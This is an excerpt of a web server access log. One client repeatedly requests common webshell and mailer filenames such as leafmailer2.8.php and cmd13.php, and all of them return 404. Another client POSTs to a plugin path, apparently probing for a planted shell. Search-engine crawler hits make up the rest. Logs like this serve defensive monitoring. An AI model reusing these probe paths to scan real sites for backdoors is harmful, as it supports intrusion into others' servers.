105.74.12.34 - - [18/Oct/2025:12:00:38 -0400] "GET /leafmailer2.8.php HTTP/1.1" 404 10899 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:12:00:48 -0400] "GET /x.php HTTP/1.1" 404 10898 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
66.249.64.106 - - [18/Oct/2025:12:00:49 -0400] "GET /products111865302?kg=0110501174 HTTP/1.1" 200 29158 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
105.74.12.34 - - [18/Oct/2025:12:00:51 -0400] "GET /srx.php HTTP/1.1" 404 10898 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:12:00:54 -0400] "GET /1337.php HTTP/1.1" 404 10899 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
216.73.216.159 - - [18/Oct/2025:11:59:24 -0400] "GET /products76580834?kg=0075647004 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
105.74.12.34 - - [18/Oct/2025:11:59:30 -0400] "GET /cmd13.php HTTP/1.1" 404 10905 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:11:59:39 -0400] "POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1" 404 12312 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
105.74.12.34 - - [18/Oct/2025:11:59:51 -0400] "GET /swm.php HTTP/1.1" 404 10906 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
66.249.64.106 - - [18/Oct/2025:12:00:02 -0400] "GET /categories/11347680 HTTP/1.1" 200 29002 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
105.74.12.34 - - [18/Oct/2025:11:59:58 -0400] "GET /doc.php HTTP/1.1" 404 10902 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
